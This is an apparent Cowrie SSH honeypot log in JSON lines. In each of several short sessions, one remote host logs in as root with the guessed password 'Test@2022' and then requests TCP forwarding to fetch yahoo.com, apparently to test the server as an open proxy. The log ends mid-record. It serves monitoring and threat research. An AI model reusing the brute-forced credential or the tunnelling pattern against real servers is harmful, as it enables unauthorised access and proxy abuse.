{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:02:45.968040Z","src_ip":"213.209.150.239","session":"9a04119def18"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:02:46.015462Z","src_ip":"213.209.150.239","session":"9a04119def18"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:02:46.250178Z","src_ip":"213.209.150.239","session":"9a04119def18"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":17628,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:17628","sensor":"my-vps","timestamp":"2025-08-26T01:02:46.298514Z","session":"9a04119def18"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:46.345736Z","src_ip":"213.209.150.239","session":"9a04119def18"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":22072,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:22072","sensor":"my-vps","timestamp":"2025-08-26T01:02:46.481400Z","session":"9a04119def18"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:46.528550Z","src_ip":"213.209.150.239","session":"9a04119def18"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:02:46.576484Z","src_ip":"213.209.150.239","session":"9a04119def18"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":24222,"dst_ip":"1.2.3.4","dst_port":22,"session":"21fdb8a98e8f","protocol":"ssh","message":"New connection: 213.209.150.239:24222 (1.2.3.4:22) [session: 21fdb8a98e8f]","sensor":"my-vps","timestamp":"2025-08-26T01:02:46.622770Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:02:46.623557Z","src_ip":"213.209.150.239","session":"21fdb8a98e8f"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:02:46.670951Z","src_ip":"213.209.150.239","session":"21fdb8a98e8f"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:02:46.905713Z","src_ip":"213.209.150.239","session":"21fdb8a98e8f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":27426,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:27426","sensor":"my-vps","timestamp":"2025-08-26T01:02:46.954006Z","session":"21fdb8a98e8f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:47.001492Z","src_ip":"213.209.150.239","session":"21fdb8a98e8f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":23018,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:23018","sensor":"my-vps","timestamp":"2025-08-26T01:02:47.137741Z","session":"21fdb8a98e8f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:47.185808Z","src_ip":"213.209.150.239","session":"21fdb8a98e8f"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:02:47.234073Z","src_ip":"213.209.150.239","session":"21fdb8a98e8f"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":24260,"dst_ip":"1.2.3.4","dst_port":22,"session":"93a528e4d471","protocol":"ssh","message":"New connection: 213.209.150.239:24260 (1.2.3.4:22) [session: 93a528e4d471]","sensor":"my-vps","timestamp":"2025-08-26T01:02:47.280496Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:02:47.281509Z","src_ip":"213.209.150.239","session":"93a528e4d471"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:02:47.329537Z","src_ip":"213.209.150.239","session":"93a528e4d471"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:02:47.565807Z","src_ip":"213.209.150.239","session":"93a528e4d471"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":7838,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:7838","sensor":"my-vps","timestamp":"2025-08-26T01:02:47.614604Z","session":"93a528e4d471"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:47.662745Z","src_ip":"213.209.150.239","session":"93a528e4d471"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":17042,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:17042","sensor":"my-vps","timestamp":"2025-08-26T01:02:47.797650Z","session":"93a528e4d471"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:47.845129Z","src_ip":"213.209.150.239","session":"93a528e4d471"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:02:47.893317Z","src_ip":"213.209.150.239","session":"93a528e4d471"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":24312,"dst_ip":"1.2.3.4","dst_port":22,"session":"05bdf12583aa","protocol":"ssh","message":"New connection: 213.209.150.239:24312 (1.2.3.4:22) [session: 05bdf12583aa]","sensor":"my-vps","timestamp":"2025-08-26T01:02:47.948917Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:02:47.949895Z","src_ip":"213.209.150.239","session":"05bdf12583aa"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:02:48.006453Z","src_ip":"213.209.150.239","session":"05bdf12583aa"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:02:48.289212Z","src_ip":"213.209.150.239","session":"05bdf12583aa"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":19752,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:19752","sensor":"my-vps","timestamp":"2025-08-26T01:02:48.346836Z","session":"05bdf12583aa"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:48.403574Z","src_ip":"213.209.150.239","session":"05bdf12583aa"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":28641,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:28641","sensor":"my-vps","timestamp":"2025-08-26T01:02:48.559107Z","session":"05bdf12583aa"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:48.615667Z","src_ip":"213.209.150.239","session":"05bdf12583aa"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:02:48.673570Z","src_ip":"213.209.150.239","session":"05bdf12583aa"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":24361,"dst_ip":"1.2.3.4","dst_port":22,"session":"9c771ee0442d","protocol":"ssh","message":"New connection: 213.209.150.239:24361 (1.2.3.4:22) [session: 9c771ee0442d]","sensor":"my-vps","timestamp":"2025-08-26T01:02:48.729021Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:02:48.729678Z","src_ip":"213.209.150.239","session":"9c771ee0442d"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:02:48.786744Z","src_ip":"213.209.150.239","session":"9c771ee0442d"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:02:49.068094Z","src_ip":"213.209.150.239","session":"9c771ee0442d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":28675,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:28675","sensor":"my-vps","timestamp":"2025-08-26T01:02:49.125477Z","session":"9c771ee0442d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:49.181899Z","src_ip":"213.209.150.239","session":"9c771ee0442d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":8787,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:8787","sensor":"my-vps","timestamp":"2025-08-26T01:02:49.334705Z","session":"9c771ee0442d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:49.391344Z","src_ip":"213.209.150.239","session":"9c771ee0442d"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:02:49.448602Z","src_ip":"213.209.150.239","session":"9c771ee0442d"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":24417,"dst_ip":"1.2.3.4","dst_port":22,"session":"28c1f8f3d614","protocol":"ssh","message":"New connection: 213.209.150.239:24417 (1.2.3.4:22) [session: 28c1f8f3d614]","sensor":"my-vps","timestamp":"2025-08-26T01:02:49.504338Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:02:49.505203Z","src_ip":"213.209.150.239","session":"28c1f8f3d614"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com"